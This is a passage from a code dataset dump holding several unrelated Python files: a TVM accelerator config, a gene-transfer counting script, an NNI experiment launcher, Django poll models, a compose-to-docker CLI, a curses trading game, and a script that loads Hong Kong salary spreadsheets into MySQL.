get_env()\n return get_scratchpad_memory_info(spec, 5)\n\n@tvm.register_func(\"tvm.info.mem.{0}{1}\".format(Environment.scratchpad_scope_prefix, '6'))\ndef mem_info_scratchpad():\n spec = get_env()\n return get_scratchpad_memory_info(spec, 6)\n\n@tvm.register_func(\"tvm.info.mem.{0}{1}\".format(Environment.scratchpad_scope_prefix, '7'))\ndef mem_info_scratchpad():\n spec = get_env()\n return get_scratchpad_memory_info(spec, 7)\n\n#################################\n# register accumulation buffer. #\n#################################\n@tvm.register_func(\"tvm.info.mem.%s\" % Environment.acc_scope)\ndef mem_info_acc():\n spec = get_env()\n acc_cfg = spec.cfg['acc_buffer']\n return tvm.make.node(\"MemoryInfo\",\n unit_bits=8,\n max_simd_bits=acc_cfg['width_per_channel'],\n max_num_bits=(1 << acc_cfg['log_size']) * 8,\n head_address=None,\n base_address=0)\n\n\ndef init_default_env():\n \"\"\"Iniitalize the default global env\"\"\"\n curr_path = os.path.dirname(\n os.path.abspath(os.path.expanduser(__file__)))\n proj_root = os.path.abspath(os.path.join(curr_path, \"../../../\"))\n filename = \"nnpu_config.yaml\"\n path_list = [\n os.path.join(curr_path, filename),\n os.path.join(proj_root, \"build\", filename),\n os.path.join(proj_root, filename),\n os.path.join(proj_root, \"nnpu\", filename),\n os.path.join(proj_root, \"nnpu/config\", filename)\n ]\n path_list = [p for p in path_list if os.path.exists(p)]\n if not path_list:\n raise RuntimeError(\n \"Error: {} not found.make sure you have config.json in your vta root\"\n .format(filename))\n return Environment(path_list[0])\n\n# TVM related registration\n@tvm.register_func(\"tvm.intrin.rule.default.nnpu.coproc_sync\")\ndef coproc_sync(op):\n _ = op\n return tvm.const(0, 'int32')\n\n@tvm.register_func(\"tvm.intrin.rule.default.nnpu.coproc_dep_push\")\ndef coproc_dep_push(op):\n return make_intrin_call('void', 'DependPush',\n op.args[0], op.args[1])\n\n@tvm.register_func(\"tvm.intrin.rule.default.nnpu.coproc_dep_pop\")\ndef coproc_dep_pop(op):\n return make_intrin_call('void', 'DependPop',\n op.args[0], op.args[1])\n\nEnvironment.current = init_default_env()\n","sub_path":"nnpu/python/nnpu/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":8963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"504238885","text":"import os\nimport glob\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom Bio import SeqIO\nimport s0_Kelp_bins_config\nimport seaborn as sns\nfrom s0_suspicious_HGTs import suspicious_HGTs\nimport numpy as np\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport s0_Kelp_bins_config as KelpCfg\nfrom s0_suspicious_HGTs import suspicious_HGTs\n\n\n############################################### input file and parameters ##############################################\n\ngenome_id_file = '/Users/songweizhi/Desktop/KelpBins/genome_id_list.txt'\n\nday_list = ['050416', '060416', '080416', # 2016-04: 05, 06, 08\n '070616', '140616', # 2016-06: 07, 14\n '050716', '070716', # 2016-07: 05, 07\n '110816', '170816', # 2016-08: 11, 17\n '061016', # 2016-10: 06\n '141216', '161216', # 2016-12: 14, 16\n '070217', '080217', # 2017-02: 07, 08\n '040417', '050417', # 2017-04: 04, 05\n '050617', '130617'] # 2017-06: 05, 13\n\nmonth_list = ['0416', '0616', '0716', '0816', '1016', '1216', '0217', '0417', '0617']\nlocation_list = ['BH', 'BI', 'CB', 'SH']\nhost = 'ER'\n\n\nwd = '/Users/songweizhi/Desktop/KelpBins/combined_pcofg'\ngrouping_file_folder = 'GoodBins_0.5_0.05_pcofg_grouping'\nPG_output_folder = 'TT_90MGs_PG'\npwd_candidates_seq_file = 'GoodBins_0.5_0.05_all_combined_ffn.fasta'\noutput_prefix = ''\ndetection_ranks = 'pcofg'\ngrouping_file_highest_rank = '/Users/songweizhi/Desktop/KelpBins/GoodBins_0.5_0.05_pcofg_grouping/GoodBins_0.5_0.05_p10_grouping.txt'\npwd_candidates_file_PG_normal_txt = 'GoodBins_0.5_0.05_PG_pcofg_normal.txt'\nplot_all_genomes = False\npwd_group_to_taxon_file = '/Users/songweizhi/Desktop/KelpBins/GoodBins_0.5_0.05_pcofg_grouping/GoodBins_0.5_0.05_c15_group_to_taxon.txt'\ngrouping_file = '/Users/songweizhi/Desktop/KelpBins/GoodBins_0.5_0.05_pcofg_grouping/GoodBins_0.5_0.05_c15_grouping.txt'\n\nos.chdir(wd)\n\n########################################################################################################################\n\n\n# get the number of HGT at each month\nsample_month_HGT_num = {}\nfor each in open(pwd_candidates_file_PG_normal_txt):\n if not each.startswith('Gene_1'):\n each_split = each.strip().split('\\t')\n gene_1 = each_split[0]\n gene_2 = each_split[1]\n concatenated_genes = '%s___%s' % (gene_1, gene_2)\n\n if concatenated_genes not in suspicious_HGTs:\n gene_1_genome = '_'.join(gene_1.split('_')[:-1])\n gene_2_genome = '_'.join(gene_2.split('_')[:-1])\n direction = each_split[6]\n\n donor_genome = direction.split('-->')[0]\n recipient_genome = direction.split('-->')[1]\n if '%)' in recipient_genome:\n recipient_genome = recipient_genome.split('(')[0]\n\n sample_date = recipient_genome.split('_')[2]\n sample_month = sample_date[2:]\n\n # get the number of HGT at each month\n if sample_month not in sample_month_HGT_num:\n sample_month_HGT_num[sample_month] = 1\n else:\n sample_month_HGT_num[sample_month] += 1\n\n\n# get genome size dict\ngenome_size_dict = {}\nfor each_genome_size in open(KelpCfg.genome_size_file):\n if not each_genome_size.startswith('Genome'):\n each_genome_size_split = each_genome_size.strip().split('\\t')\n genome_id = each_genome_size_split[0]\n genome_size = float(each_genome_size_split[1])\n genome_size_dict[genome_id] = genome_size\n\n\n# get the total length of genome bins at each month\nsample_month_genome_size_dict = {}\nfor genome in genome_size_dict:\n genome_size = genome_size_dict[genome]\n sample_month = genome.split('_')[2][2:]\n if sample_month not in sample_month_genome_size_dict:\n sample_month_genome_size_dict[sample_month] = genome_size\n else:\n sample_month_genome_size_dict[sample_month] += genome_size\n\n\nprint('The number of HGT per Mbp sequences at a monthly basis for all genome bins:')\nfor mth in month_list:\n mth_HGT_num = sample_month_HGT_num[mth]\n mth_genome_size = sample_month_genome_size_dict[mth]\n print('%s\\t%s' % (mth, float(\"{0:.2f}\".format(mth_HGT_num/mth_genome_size))))\n\n\n\n\n\n\n\n\n","sub_path":"old_1/s19_recent_HGT_with_time_2_all_bins.py","file_name":"s19_recent_HGT_with_time_2_all_bins.py","file_ext":"py","file_size_in_byte":4485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"86949663","text":"import contextlib\nimport logging\nfrom pathlib import Path\nimport socket\nfrom subprocess import Popen\nimport sys\nimport time\nfrom typing import Optional, Tuple\n\nimport colorama\n\nimport nni.runtime.protocol\nimport nni_node\n\nfrom .config import ExperimentConfig\nfrom .config import convert\nfrom .pipe import Pipe\nfrom . import rest\nfrom ..tools.nnictl.config_utils import Experiments\n\n_logger = logging.getLogger('nni.experiment')\n\n\ndef start_experiment(exp_id: str, config: ExperimentConfig, port: int, debug: bool) -> Tuple[Popen, Pipe]:\n pipe = None\n proc = None\n\n config.validate(initialized_tuner=True)\n _ensure_port_idle(port)\n if isinstance(config.training_service, list): # hybrid training service\n _ensure_port_idle(port + 1, 'Hybrid training service requires an additional port')\n elif config.training_service.platform in ['remote', 'openpai', 'kubeflow', 'frameworkcontroller', 'adl']:\n _ensure_port_idle(port + 1, f'{config.training_service.platform} requires an additional port')\n\n try:\n _logger.info('Creating experiment, Experiment ID: %s', colorama.Fore.CYAN + exp_id + colorama.Style.RESET_ALL)\n pipe = Pipe(exp_id)\n start_time, proc = _start_rest_server(config, port, debug, exp_id, pipe.path)\n _logger.info('Connecting IPC pipe...')\n pipe_file = pipe.connect()\n nni.runtime.protocol._in_file = pipe_file\n nni.runtime.protocol._out_file = pipe_file\n _logger.info('Statring web server...')\n _check_rest_server(port)\n platform = 'hybrid' if isinstance(config.training_service, list) else config.training_service.platform\n _save_experiment_information(exp_id, port, start_time, platform,\n config.experiment_name, proc.pid, config.experiment_working_directory)\n _logger.info('Setting up...')\n _init_experiment(config, port, debug)\n return proc, pipe\n\n except Exception as e:\n _logger.error('Create experiment failed')\n if proc is not None:\n with contextlib.suppress(Exception):\n proc.kill()\n if pipe is not None:\n with contextlib.suppress(Exception):\n pipe.close()\n raise e\n\n\ndef _ensure_port_idle(port: int, message: Optional[str] = None) -> None:\n sock = socket.socket()\n if sock.connect_ex(('localhost', port)) == 0:\n sock.close()\n message = f'(message)' if message else ''\n raise RuntimeError(f'Port {port} is not idle {message}')\n\n\ndef _start_rest_server(config: ExperimentConfig, port: int, debug: bool, experiment_id: str, pipe_path: str) -> Tuple[int, Popen]:\n if isinstance(config.training_service, list):\n ts = 'hybrid'\n else:\n ts = config.training_service.platform\n if ts == 'openpai':\n ts = 'pai'\n\n args = {\n 'port': port,\n 'mode': ts,\n 'experiment_id': experiment_id,\n 'start_mode': 'new',\n 'log_level': 'debug' if debug else 'info',\n 'dispatcher_pipe': pipe_path,\n }\n\n node_dir = Path(nni_node.__path__[0])\n node = str(node_dir / ('node.exe' if sys.platform == 'win32' else 'node'))\n main_js = str(node_dir / 'main.js')\n cmd = [node, '--max-old-space-size=4096', main_js]\n for arg_key, arg_value in args.items():\n cmd.append('--' + arg_key)\n cmd.append(str(arg_value))\n\n if sys.platform == 'win32':\n from subprocess import CREATE_NEW_PROCESS_GROUP\n proc = Popen(cmd, cwd=node_dir, creationflags=CREATE_NEW_PROCESS_GROUP)\n else:\n proc = Popen(cmd, cwd=node_dir)\n return int(time.time() * 1000), proc\n\n\ndef _check_rest_server(port: int, retry: int = 3) -> None:\n for i in range(retry):\n with contextlib.suppress(Exception):\n rest.get(port, '/check-status')\n return\n if i > 0:\n _logger.warning('Timeout, retry...')\n time.sleep(1)\n rest.get(port, '/check-status')\n\n\ndef _init_experiment(config: ExperimentConfig, port: int, debug: bool) -> None:\n for cluster_metadata in convert.to_cluster_metadata(config):\n rest.put(port, '/experiment/cluster-metadata', cluster_metadata)\n rest.post(port, '/experiment', convert.to_rest_json(config))\n\n\ndef _save_experiment_information(experiment_id: str, port: int, start_time: int, platform: str, name: str, pid: int, logDir: str) -> None:\n experiment_config = Experiments()\n experiment_config.add_experiment(experiment_id, port, start_time, platform, name, pid=pid, logDir=logDir)\n","sub_path":"nni/experiment/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":4543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"163399162","text":"from django.db import models\n\nfrom apps.users.models import Employee, \\\n Program\nfrom apps.enrollment.courses.models.group import GROUP_TYPE_CHOICES\n\nfrom .section import SectionOrdering, Section\n\n\nclass Template(models.Model):\n title = models.CharField(max_length=40, verbose_name='tytuł')\n description = models.TextField(blank=True, verbose_name='opis')\n studies_type = models.ForeignKey(\n Program,\n verbose_name='typ studiów',\n blank=True,\n null=True,\n on_delete=models.CASCADE)\n no_course = models.BooleanField(\n blank=False,\n null=False,\n default=False,\n verbose_name='nie przypisany')\n deleted = models.BooleanField(blank=False, null=False, default=False, verbose_name='usunięty')\n exam = models.BooleanField(blank=False, null=False, default=True,\n verbose_name='przedmiot z egzaminem')\n group_type = models.CharField(\n blank=True,\n null=True,\n max_length=2,\n choices=GROUP_TYPE_CHOICES,\n verbose_name='typ zajęć')\n sections = models.ManyToManyField(Section, verbose_name='sekcje',\n through='TemplateSections')\n\n in_grade = models.BooleanField(default=False, verbose_name='Szablon wykorzystywany w ocenie')\n\n author = models.ForeignKey(Employee, verbose_name='autor', on_delete=models.CASCADE)\n\n class Meta:\n verbose_name = 'szablon'\n verbose_name_plural = 'szablony'\n app_label = 'poll'\n ordering = ['title']\n\n def __str__(self):\n res = str(self.title)\n if self.studies_type:\n res += ', typ studiów: ' + str(self.studies_type)\n if self.course:\n res += ', przedmiot: ' + str(self.course)\n if self.group_type:\n res += ', typ grupy: ' + str(self.get_group_type_display())\n return res\n\n def all_sections(self):\n sections = self.templatesections_set.all().values_list('pk', flat=True)\n return Section.objects.filter(pk__in=sections)\n\n\nclass TemplateSections(models.Model):\n id = models.AutoField(primary_key=True)\n template = models.ForeignKey(Template, verbose_name='ankieta', on_delete=models.CASCADE)\n section = models.ForeignKey(Section, verbose_name='sekcja', on_delete=models.CASCADE)\n\n class Meta:\n verbose_name_plural = 'pozycje sekcji'\n verbose_name = 'pozycja sekcji'\n app_label = 'poll'\n ordering = ['id']\n\n def all_questions(self):\n return self.section.all_questions()\n","sub_path":"zapisy/apps/grade/poll/models/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"279864929","text":"# -*- coding: utf-8 -*-\n\nimport click\nimport yaml\nimport sys\nfrom dc2dr import parser\n\ndef parse_yml(path):\n f = open(path)\n y = yaml.safe_load(f)\n\n run_commands = parser.parse_compose_file(y)\n for c in run_commands:\n print(c)\n\n@click.command()\n@click.argument('f', type=click.Path(exists=True))\ndef main(f):\n parse_yml(f)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"dc2dr/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"494912761","text":"from abc import ABC\nfrom typing import List\nfrom ..typings.configurations import OptimalConfigurations\nfrom .aux import build_probabilities_matrix, build_amplitudes_matrix, get_number_eta_pairs\n\n\nclass OptimizationResult(ABC):\n \"\"\" Generic class acting as an interface for any Optimization Result \"\"\"\n\n def __init__(self, optimal_configurations: OptimalConfigurations) -> None:\n\n self._two_eta_configurations = self._convert_input_group_eta_configurations_into_two_etas(\n optimal_configurations)\n self._probabilities_matrices = [build_probabilities_matrix(two_eta_configuration)\n for two_eta_configuration in self._two_eta_configurations]\n self._amplitudes_matrices = [build_amplitudes_matrix(two_eta_configuration)\n for two_eta_configuration in self._two_eta_configurations]\n\n @property\n def probabilities_matrix(self) -> List[List[float]]:\n return self._probabilities_matrices[0]\n\n @property\n def amplitudes_matrix(self) -> List[List[float]]:\n return self._amplitudes_matrices[0]\n\n @property\n def probabilities_matrices(self) -> List[List[List[float]]]:\n return self._probabilities_matrices\n\n @property\n def amplitudes_matrices(self) -> List[List[List[float]]]:\n return self._amplitudes_matrices\n\n def _convert_input_group_eta_configurations_into_two_etas(self,\n optimal_configurations: OptimalConfigurations\n ) -> List[OptimalConfigurations]:\n eta_groups_length = len(optimal_configurations['eta_groups'][0])\n\n if eta_groups_length > 3:\n raise ValueError('Eta groups support only 2 or 3 elements')\n if eta_groups_length == 2:\n return [optimal_configurations]\n\n number_eta_pairs, _ = get_number_eta_pairs(optimal_configurations['eta_groups'])\n\n return self._get_two_eta_configurations(optimal_configurations, number_eta_pairs, eta_groups_length)\n\n def _get_two_eta_configurations(self, optimal_configurations: OptimalConfigurations,\n number_eta_pairs: int,\n eta_groups_length: int) -> List[OptimalConfigurations]:\n\n number_third_channels = int(len(optimal_configurations['eta_groups']) / number_eta_pairs)\n if number_third_channels <= 1:\n return [optimal_configurations]\n\n list_configs = []\n for i in range(number_eta_pairs):\n new_config = OptimalConfigurations({\n 'eta_groups': optimal_configurations['eta_groups']\n [i * number_third_channels:(i + 1) * number_third_channels],\n 'best_algorithm': optimal_configurations['best_algorithm']\n [i * number_third_channels:(i + 1) * number_third_channels],\n 'probabilities': optimal_configurations['probabilities']\n [i * number_third_channels:(i + 1) * number_third_channels],\n 'configurations': optimal_configurations['configurations']\n [i * number_third_channels:(i + 1) * number_third_channels],\n 'number_calls_made': optimal_configurations['number_calls_made']\n [i * number_third_channels:(i + 1) * number_third_channels]\n })\n list_configs.append(new_config)\n\n return list_configs\n","sub_path":"qcd/optimizationresults/optimizationresult.py","file_name":"optimizationresult.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"222566111","text":"from __future__ import print_function\n\nimport collections\nimport curses\nimport itertools\nimport random\nimport time\n\nFPS = 30\nREFRESH_TIME = float(1)/FPS\nSTARTING_CASH = 100\nGRAPH_MAX_WIDTH = 80\n\n\nclass ShavingGame(object):\n\n def __init__(self):\n self.cash = STARTING_CASH\n self.buy = 5\n self.sell = 5.01\n self.owned = 0\n self.debug_str = ''\n self.render_time = time.time()\n self.price_time = time.time()\n self.trend_time = time.time()\n self.trend_up = 1\n self.buy_limits = collections.defaultdict(lambda:0)\n self.sell_limits = collections.defaultdict(lambda:0)\n self.price_history = collections.deque()\n\n def draw_graph(self, start_index, values, height=10):\n lines = ['Price History']\n if not values:\n return lines\n mx = max(values)\n mn = min(values)\n diff = mx - mn\n for i in range(height):\n line = ''\n for val in values:\n line += ' ' if mn + (height-i) * diff / height > val else 'X'\n # line = str(i * diff / height > val)\n line = '{0:>80}'.format(line)\n lines.append(line)\n return lines\n \n def update_price(self):\n if self.price_time > time.time():\n return\n if self.trend_time < time.time():\n self.trend_time = time.time() + random.uniform(5, 15)\n self.trend_up = random.randint(0, 1)\n change = round(random.uniform(-0.03 if not self.trend_up else -0.02, 0.03 if self.trend_up else 0.02), 2)\n\n self.debug_str = \"change={}trend_up={}\".format(change, self.trend_up)\n self.buy += change\n self.sell = self.buy + float(random.randrange(1,2))/100\n self.price_time = time.time() + float(random.randrange(5,20))/10\n self.price_history.append(self.buy)\n if len(self.price_history) > GRAPH_MAX_WIDTH:\n self.price_history.popleft()\n \n for price in (price for price in self.buy_limits if price >= self.sell):\n self.owned += self.buy_limits[price]\n self.buy_limits[price] = 0\n for price in (_ for _ in self.sell_limits if _ <= self.buy):\n self.cash += self.sell_limits[price] * price\n self.sell_limits[price] = 0\n \n def process_input(self, screen):\n user_in = screen.getch()\n if user_in != -1:\n user_in = chr(user_in)\n if user_in == 'b' and self.cash > self.sell:\n self.cash -= self.sell\n self.owned += 1\n if user_in == 's' and self.owned > 0:\n self.owned -= 1\n self.cash += self.buy\n if user_in == 'd' and self.owned > 0:\n self.owned -= 1\n self.sell_limits[self.sell] += 1\n if user_in == 'n' and self.cash > self.buy:\n self.cash -= self.buy\n self.buy_limits[self.buy] += 1\n if user_in == 'x':\n for price in self.buy_limits:\n self.cash += price * self.buy_limits[price]\n self.buy_limits[price] = 0\n for price in self.sell_limits:\n self.owned += self.sell_limits[price]\n self.sell_limits[price] = 0\n \n def run(self, screen):\n screen.nodelay(True)\n while True:\n if time.time() < self.render_time + REFRESH_TIME:\n time.sleep((self.render_time + REFRESH_TIME) - time.time())\n screen.erase()\n value = self.cash + self.owned*self.buy\n output = [\n 'Cash: ${:,.2f} Shares: {}'.format(self.cash, self.owned),\n 'Buy: ${:,.2f} Sell: {:,.2f}'.format(self.buy, self.sell),\n 'Value: ${:,.2f} Gain: {:,.1f}%'.format(value, ((value - STARTING_CASH) / STARTING_CASH)*100),\n 'Debug: {}'.format(self.debug_str),\n ]\n output.append('{:<40}{:>40}'.format('Limit Buy Orders', 'Limit Sell Orders'))\n buys = [(price, self.buy_limits[price]) for price in self.buy_limits if self.buy_limits[price]]\n buys = sorted(buys, key=lambda x: x[0])\n sells = [(price, self.sell_limits[price]) for price in self.sell_limits if self.sell_limits[price]]\n sells = sorted(sells, key=lambda x: x[0])\n for buy_tup, sell_tup in itertools.izip_longest(buys, sells):\n buy_msg = ''\n if buy_tup:\n buy_msg = \"${:,.2f} - {} shares\".format(buy_tup[0], buy_tup[1])\n sell_msg = ''\n if sell_tup:\n sell_msg = \"${:,.2f} - {} shares\".format(sell_tup[0], sell_tup[1])\n output.append('{:<40}{:>40}'.format(buy_msg, sell_msg))\n output += self.draw_graph(len(output), self.price_history)\n for i, s in enumerate(output):\n screen.addstr(i, 0, s)\n self.render_time = time.time()\n self.process_input(screen)\n self.update_price()\n if time.time() <= self.price_time:\n self.update_price()\n # self.debug_str = 'trend_up={}'.format(self.trend_up)\n\nif __name__ == '__main__':\n game = ShavingGame()\n curses.wrapper(game.run)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"204844828","text":"#Prerequisites\nimport pandas as panda\n\nimport pymysql\n\ndef removeFootnoteTags(textSample):\n newText = \"\"\n\n cursor = 0\n ignoreChar = False\n\n while cursor < len(textSample):\n\n if \"(\" in textSample[cursor]:\n ignoreChar = True\n if \")\" in textSample[cursor]:\n ignoreChar = False\n\n\n if ignoreChar is not True:\n newText = newText + textSample[cursor]\n cursor += 1\n return newText\n\ndef shortenColumn(textSample):\n\n columnNameLength = 25\n newText = \"\"\n cursor = 0\n while cursor < columnNameLength and cursor < len(textSample):\n newText = newText + textSample[cursor]\n cursor += 1\n \n return newText\n \n\n#Create database connection\nhost = \"localhost\";\ndatabase = \"hkhousinganalysis\";\nusername = \"root\";\npassword = \"\";\n\n\nconnection = pymysql.connect(host=host, user=username, password=password, db=database)\n\n#Import data from Monthly Salary HK Stats\nworkbookSheets = panda.ExcelFile(\"../raw_data/censtats_data/monthlyPay_data.xlsx\")\n\n\ncursor = connection.cursor()\n\n#Check if table exists\ncheckTableExistsQuery = cursor.execute(\"SHOW TABLES WHERE `Tables_in_hkhousinganalysis` = 'censtats_monthlypay_amount_data';\")\n\nif checkTableExistsQuery > 0:\n print(\"Table exists\")\nelse:\n\n createAmountTableQuery = \"CREATE TABLE `censtats_monthlypay_amount_data` (\"\n createChangeTableQuery = \"CREATE TABLE `censtats_monthlypay_change_data` (\"\n\n #Get data for each sheet in workbook\n for sheet in workbookSheets.sheet_names:\n if(sheet != \"Index\"):\n\n \n\n monthlySalariesDataFeed = panda.read_excel(\"../raw_data/censtats_data/monthlyPay_data.xlsx\", sheet_name=sheet)\n\n\n\n createAmountTableQuery = createAmountTableQuery + \"`year`\" + \" VARCHAR(255) NOT NULL,\"\n createChangeTableQuery = createChangeTableQuery + \"`year`\" + \" VARCHAR(255) NOT NULL,\"\n #Get list of column names\n columns = list(monthlySalariesDataFeed)\n\n\n #Make table fields from catagories and subcategories\n\n categoryIndexTarget = 0\n\n earnerAllCategories = list(monthlySalariesDataFeed[columns[0]])\n\n earnerMonthlySalaries = list(monthlySalariesDataFeed[columns[1]])\n\n earnerMonthlySalariesYoYPercentChange = list(monthlySalariesDataFeed[columns[2]])\n\n #Interate through all rows\n while(categoryIndexTarget < len(list(earnerAllCategories))):\n if(\"By \" in str(earnerAllCategories[categoryIndexTarget])):\n \n #Create category name for table column\n categoryName = str(earnerAllCategories[categoryIndexTarget])\n categoryName = categoryName.replace(\"By \", \"\")\n\n #Check for numbers in format \"( number )\" and remove\n categoryName = removeFootnoteTags(categoryName)\n\n categoryName = categoryName.replace(\")\", \"\")\n\n categoryName = categoryName.replace(\" \", \"_\")\n\n categoryName = shortenColumn(categoryName)\n\n \n #Find how many subcategories to count before reaching next category\n subcategoryIndexTarget = categoryIndexTarget + 1 #Start off on next line after the By line\n\n \n #Get subcategory from category\n for x in range(len(earnerAllCategories)):\n if(earnerAllCategories[subcategoryIndexTarget] == \"Notes : \"):\n break;\n elif(\"By \" in str(earnerAllCategories[subcategoryIndexTarget])): #End of category\n break;\n else:\n subcategoryName = str(earnerAllCategories[subcategoryIndexTarget])\n \n \n\n #Check for numbers in format \"( number )\" and remove\n subcategoryName = removeFootnoteTags(subcategoryName)\n\n #Check and strip punctuation\n punctuationBlacklist = \"!@#$%^&*_+-=/\\|.,;:≥)\";\n for punctuationCursor in subcategoryName:\n if punctuationCursor in punctuationBlacklist:\n subcategoryName = subcategoryName.replace(punctuationCursor, \"\")\n\n \n\n subcategoryName = subcategoryName.replace(\" \", \"_\")\n \n subcategoryName = subcategoryName.lower()\n \n subcategoryName = shortenColumn(subcategoryName)\n\n subcategoryMonthlySalary = earnerMonthlySalaries[subcategoryIndexTarget];\n\n subcategoryMonthlySalaryYoYPercentChange = earnerMonthlySalariesYoYPercentChange[subcategoryIndexTarget]\n\n\n\n #Remove empty rows that include nan\n if(subcategoryName != \"nan\"):\n #Display output\n \n createAmountTableQuery = createAmountTableQuery + \"`\" + categoryName + \"-\" + subcategoryName + \"`\" + \" VARCHAR(255) NULL,\"\n createChangeTableQuery = createChangeTableQuery + \"`\" + categoryName + \"-\" + subcategoryName + \"`\" + \" VARCHAR(255) NULL,\"\n #print(categoryName+\"-\"+subcategoryName)\n \n subcategoryIndexTarget += 1\n \n categoryIndexTarget += 1 \n elif(str(earnerAllCategories[categoryIndexTarget]) == \"Notes : \"):\n createAmountTableQuery = createAmountTableQuery[:-1]\n createAmountTableQuery = createAmountTableQuery + \", PRIMARY KEY (`year`)\" + \");\"\n\n createChangeTableQuery = createChangeTableQuery[:-1]\n createChangeTableQuery = createChangeTableQuery + \", PRIMARY KEY (`year`)\" + \");\"\n\n #print(createTableQuery)\n createAmountTable = cursor.execute(createAmountTableQuery)\n\n connection.commit()\n \n createChangeTable = cursor.execute(createChangeTableQuery)\n connection.commit()\n\n print(\"Monthly salary tables created\")\n\n break;\n else:\n categoryIndexTarget +=1\n break;\n\n\n#Check for non-existing columns and add columns to database table\n\n\nfor sheet in workbookSheets.sheet_names:\n if(sheet != \"Index\"):\n monthlySalariesDataFeed = panda.read_excel(\"../raw_data/censtats_data/monthlyPay_data.xlsx\", sheet_name=sheet)\n\n\n print(\"Checking sheet\"+ sheet +\"\\n\\n\")\n #Get list of column names\n columns = list(monthlySalariesDataFeed)\n\n sheetKeys = []\n\n #Make table fields from catagories and subcategories\n\n categoryIndexTarget = 0\n\n earnerAllCategories = list(monthlySalariesDataFeed[columns[0]])\n\n #Interate through all rows\n while(categoryIndexTarget < len(list(earnerAllCategories))):\n if(\"By \" in str(earnerAllCategories[categoryIndexTarget])):\n \n #Create category name for table column\n categoryName = str(earnerAllCategories[categoryIndexTarget])\n categoryName = categoryName.replace(\"By \", \"\")\n\n #Check for numbers in format \"( number )\" and remove\n categoryName = removeFootnoteTags(categoryName)\n\n categoryName = categoryName.replace(\")\", \"\")\n\n categoryName = categoryName.replace(\" \", \"_\")\n\n categoryName = shortenColumn(categoryName)\n\n \n #Find how many subcategories to count before reaching next category\n subcategoryIndexTarget = categoryIndexTarget + 1 #Start off on next line after the By line\n\n \n #Get subcategory from category\n for x in range(len(earnerAllCategories)):\n if(earnerAllCategories[subcategoryIndexTarget] == \"Notes : \"):\n break;\n elif(\"By \" in str(earnerAllCategories[subcategoryIndexTarget])): #End of category\n break;\n else:\n subcategoryName = str(earnerAllCategories[subcategoryIndexTarget])\n \n \n\n #Check for numbers in format \"( number )\" and remove\n subcategoryName = removeFootnoteTags(subcategoryName)\n\n #Check and strip punctuation\n punctuationBlacklist = \"!@#$%^&*_+-=/\\|.,;:≥)\";\n for punctuationCursor in subcategoryName:\n if punctuationCursor in punctuationBlacklist:\n subcategoryName = subcategoryName.replace(punctuationCursor, \"\")\n\n \n\n subcategoryName = subcategoryName.replace(\" \", \"_\")\n \n subcategoryName = subcategoryName.lower()\n \n subcategoryName = shortenColumn(subcategoryName)\n\n #Remove empty rows that include nan\n if(subcategoryName != \"nan\"):\n #Display output\n \n sheetKeys.append(categoryName+\"-\"+subcategoryName)\n #print(categoryName+\"-\"+subcategoryName)\n \n subcategoryIndexTarget += 1\n \n categoryIndexTarget += 1 \n elif(str(earnerAllCategories[categoryIndexTarget]) == \"Notes : \"):\n\n tempComparisonStorage = []\n \n #Check monthly amount table\n compareMonthlyPayAmountColumnNamesQuery = cursor.execute(\"SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name = 'censtats_monthlypay_amount_data';\")\n\n\n compareMonthlyPayAmountColumnNames = cursor.fetchall()\n \n\n \n for column in compareMonthlyPayAmountColumnNames:\n tempComparisonStorage.append(column[0])\n\n \n del tempComparisonStorage[0]\n\n if sheetKeys != tempComparisonStorage:\n addMissingAmountColumnsQuery = \"ALTER TABLE `censtats_monthlypay_amount_data` \"\n for sheetColumn in sheetKeys:\n if sheetColumn not in tempComparisonStorage:\n addMissingAmountColumnsQuery = addMissingAmountColumnsQuery + \"ADD `\" + sheetColumn + \"`\" + \" VARCHAR(255) NULL,\"\n \n \n addMissingAmountColumnsQuery = addMissingAmountColumnsQuery[:-1]\n addMissingAmountColumnsQuery = addMissingAmountColumnsQuery + \";\"\n \n\n addMissingAmountColumns = cursor.execute(addMissingAmountColumnsQuery)\n connection.commit()\n print(\"New monthly pay amount column(s) added\")\n\n #Check monthly change table\n tempComparisonStorage = []\n compareMonthlyPayChangeColumnNamesQuery = cursor.execute(\"SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name = 'censtats_monthlypay_change_data';\")\n\n\n compareMonthlyPayChangeColumnNames = cursor.fetchall()\n \n for column in compareMonthlyPayChangeColumnNames:\n tempComparisonStorage.append(column[0])\n\n del tempComparisonStorage[0]\n\n if sheetKeys != tempComparisonStorage:\n addMissingChangeColumnsQuery = \"ALTER TABLE `censtats_monthlypay_change_data` \"\n for sheetColumn in sheetKeys:\n if sheetColumn not in tempComparisonStorage:\n addMissingChangeColumnsQuery = addMissingChangeColumnsQuery + \"ADD `\" + sheetColumn + \"`\" + \" VARCHAR(255) NULL,\"\n \n \n addMissingChangeColumnsQuery = addMissingChangeColumnsQuery[:-1]\n addMissingChangeColumnsQuery = addMissingChangeColumnsQuery + \";\"\n \n\n addMissingChangeColumns = cursor.execute(addMissingChangeColumnsQuery)\n connection.commit()\n print(\"New monthly pay change column(s) added\")\n\n break;\n else:\n categoryIndexTarget +=1\n \n#Import bulk data\n\nfor sheet in 